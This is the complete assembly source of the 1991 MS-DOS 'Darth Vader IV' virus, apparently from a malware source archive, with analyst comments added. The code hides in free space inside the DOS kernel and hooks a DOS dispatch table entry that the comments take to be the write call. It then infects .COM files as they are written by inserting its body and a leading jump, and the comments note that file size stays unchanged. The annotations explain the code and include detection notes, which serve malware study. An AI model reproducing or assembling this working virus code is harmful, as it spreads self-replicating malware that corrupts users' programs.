MalwareSourceCode/MSDOS/D-Index/Virus.MSDOS.Unknown.darth.asm

;******************************************************************************
;* *
;* D A R T H V A D E R IV *
;* *
;* (C) - Copyright 1991 by Waleri Todorov, CICTT-Sofia *
;* All Rights Reserved *
;* *
;* Enchanced by: Lazy Wizard *
;* *
;* Turbo Assembler 2.0 *
;* *
;******************************************************************************
; Analyst overview (from this listing): a tiny-model .COM program for Turbo
; Assembler. The entry code
;   1. searches the segment named by the INT 2Bh vector for a run of zero words,
;   2. scans that segment for the byte pattern 2E 8B 9F and swaps the word at
;      [operand + 80h] with the address of its own Handle routine,
;   3. copies its body into the zero run, and
;   4. puts three saved bytes back at 100h and returns there.
; The code patches its own operands by byte offset, so the instruction bytes
; must stay exactly as assembled; only comments are added here.
.model tiny
.code
org 100h
Start:
call NextLine                   ; call/pop pair: pushed return address = runtime address of First3
First3:
; Three bytes of storage (CD 20 CC as assembled). ReturnControl copies them to
; 100h; Handle stores the first three bytes of a caller's buffer into this slot.
int 20h
int 3
NextLine:
pop bx                          ; bx = runtime address of First3; later [bx+...] operands are relative to it
push ax                         ; kept on the stack until ReturnControl pops it
xor di,di
mov es,di                       ; es = 0000h, the interrupt vector table
mov es,es:[2Bh*4+2]             ; es = segment word of vector 2Bh; presumably the DOS kernel segment - TODO confirm per DOS version
mov cx,1000h                    ; SearchZero will try at most 1000h starting offsets
call SearchZero                 ; CF clear: di = start of a zero run in es large enough for the body
jc ReturnControl                ; no free run found: leave memory untouched and run the original program
xchg ax,si                      ; SearchZero leaves ax = 0, so si = 0 (scan starts at offset 0 of es)
inc si                          ; cancels the dec at the top of the loop on the first pass
SearchTable:
; Byte-by-byte scan of es for 2E 8B 9F. The loop has no upper bound in this
; listing; it ends only on a match or on the 2E 8B 75 sequence.
dec si                          ; lodsw advanced si by 2; net step is one byte per iteration
db 26h                          ; ES: override for the lodsw that follows
lodsw
cmp ax,8B2Eh                    ; memory bytes 2E 8B = CS: prefix + MOV r16,r/m16 opcode
jne SearchTable
db 26h                          ; ES: override for the lodsb that follows
lodsb
cmp al,75h                      ; ModRM 75h (mov si,cs:[di+disp8]) ends the scan without installing; the reason is not visible here - TODO confirm
je ReturnControl
cmp al,9Fh                      ; ModRM 9Fh = mov bx,cs:[bx+disp16], i.e. an indexed word-table lookup
jne SearchTable
mov si,es:[si]                  ; si = the disp16 operand, taken as the base offset of that table
mov cx,LastByte-Start           ; cx = body length in bytes
lea ax,[di+Handle-Start]        ; ax = offset Handle will have inside the copy made below
; NOTE(review): org $-1 backs the location counter up one byte, so the next
; instruction overwrites the last byte emitted for the lea - presumably a
; filler NOP from the forward reference to Handle. Confirm against a listing.
org $-1
xchg ax,es:[si+80h]             ; table word at +80h now points at Handle; ax = previous entry. 80h = index 40h in a word table; the OldWrite label suggests the DOS write function - TODO confirm
sub ax,di
sub ax,cx                       ; ax = previous entry - (di + length): rel16 from the end of the copy to the old handler
mov [bx+OldWrite-Start-2],ax    ; bx = Start+3, so this is OldWrite+1: the displacement field of the final jmp
mov word ptr [bx+NewStart+1-Start-3],di ; patch the immediate of "mov si,0" at NewStart with the copy's offset
lea si,[bx-3]                   ; si = runtime address of Start
rep movsb                       ; copy the patched body (cx bytes) from ds:si to es:di
; Defender note: after this point the only memory changes are the filled zero
; run and the swapped table word; no interrupt vector is modified in this
; listing, so checks limited to the vector table would not show the hook.
ReturnControl:
pop ax                          ; restore the AX value saved at NextLine
push ss
pop es                          ; es = ss; assumed equal to the program segment in a .COM - TODO confirm
mov di,100h
lea si,[bx+First3-Start-3]      ; First3-Start is 3, so si = bx = the saved-bytes slot
push di                         ; 100h becomes the near return address
movsw
movsb                           ; put the three saved bytes back at 100h
ret                             ; continue at 100h
; SearchZero - look in es for a run of zero words long enough to hold the body.
; In:   es:di = one byte before the first candidate offset
;       cx    = number of candidate offsets to try (must be non-zero)
; Out:  CF clear, di = start of a run of (LastByte-Start-1)/2+1 zero words
;       CF set when every candidate failed
;       ax = 0 in both cases; cx is reduced by the number of failed attempts
; Used twice: by the entry code on the segment taken from vector 2Bh, and by
; Handle on the caller's buffer.
SearchZero:
xor ax,ax                       ; ax = 0 is the word scasw compares against
inc di                          ; advance to the next candidate offset
push cx                         ; keep the attempt counter and the candidate across the scan
push di
mov cx,(LastByte-Start-1)/2+1   ; words needed, rounded up
repe scasw                      ; stops early on the first non-zero word
pop di                          ; pop does not change flags, so ZF/CF still describe the scan
pop cx
je FoundPlace                   ; ZF set: every word was zero; CF is clear because the last compare was equal
loop SearchZero                 ; try the next offset until cx reaches zero
stc                             ; nothing suitable found
FoundPlace:
ret
; Handle - the routine whose address the entry code stores in the table word at
; [table+80h]. From the register use below it expects bx = file handle,
; cx = byte count and ds:dx = buffer; the OldWrite label suggests the DOS
; write call - TODO confirm.
; When all checks pass it alters the caller's buffer in memory before chaining
; to the original handler: the body is copied into a run of zero bytes inside
; the buffer and the first three bytes become a near jmp to that copy.
; Defender notes, from the code below: the byte count is never changed, so a
; file written this way keeps its length and size comparison will not flag it;
; content hashes will. Visible traits are a leading E9 whose target lies in
; what was zero fill, and this body at that target.
; All caller registers are restored before the final jmp.
Handle:
push bp
call NextHandle                 ; call/pop pair to learn the runtime address
NextHandle:
pop bp                          ; bp = runtime address of NextHandle
push es
push ax
push bx
push cx
push si
push di
test ch,ch                      ; cx below 100h: leave the request alone
je Do
mov ax,1220h                    ; INT 2Fh AX=1220h: DOS internal, job file table entry for handle bx -> es:di
int 2Fh
mov bl,es:[di]                  ; bl = system file table index for that handle
mov ax,1216h                    ; INT 2Fh AX=1216h: DOS internal, system file table entry for index bx -> es:di
int 2Fh
cmp es:[di+29h],'MO'            ; presumably the last two letters of a COM extension in the SFT name field - TODO confirm layout and byte order
jne Do
cmp word ptr es:[di+15h],0      ; presumably the low word of the file position: only a write at offset 0 qualifies - TODO confirm
jne Do
push ds
pop es
mov di,dx                       ; es:di = caller's buffer
; NOTE(review): [bp+...] addresses through SS by default and the copy below
; uses an explicit SS: override, so this code relies on SS being the segment
; that holds the installed copy at this point - confirm.
mov ax,[di]
mov [bp+First3-NextHandle],ax   ; keep the buffer's first two bytes in the First3 slot
mov al,[di+2]
mov [bp+First3+2-NextHandle],al ; and the third byte
call SearchZero                 ; cx is still the caller's byte count: look for a zero run inside the buffer
jc Do                           ; no zero run large enough: buffer is left untouched
push di                         ; remember where the run starts
NewStart:
mov si,0                        ; immediate is patched by the entry code with the installed copy's offset
mov cx,(LastByte-Start-1)/2     ; whole words only; one word fewer than SearchZero checked
cli                             ; presumably guards the prefixed rep on CPUs that drop a prefix when interrupted - TODO confirm
rep
db 36h                          ; SS: override for the source of the movsw below
movsw                           ; copy the body from ss:si into the zero run at es:di
sti
mov di,dx                       ; back to the start of the buffer
mov al,0E9h                     ; opcode of a near jmp
stosb
pop ax                          ; ax = start of the zero run
sub ax,di
dec ax
dec ax                          ; ax = run start - (buffer start + 3): rel16 for the 3-byte jmp
stosw
Do:
pop di
pop si
pop cx
pop bx
pop ax
pop es
pop bp
OldWrite:
jmp start                       ; placeholder target; the entry code patches the rel16 so the installed copy reaches the previous table entry
LastByte label byte
end Start
; ----------------------------------------------------------------------------
; -------------> and Remember Don't Forget to Call <-------------
; ---------> ARRESTED DEVELOPMENT +31.79.426o79 H/P/A/V/AV/? <---------
; ----------------------------------------------------------------------------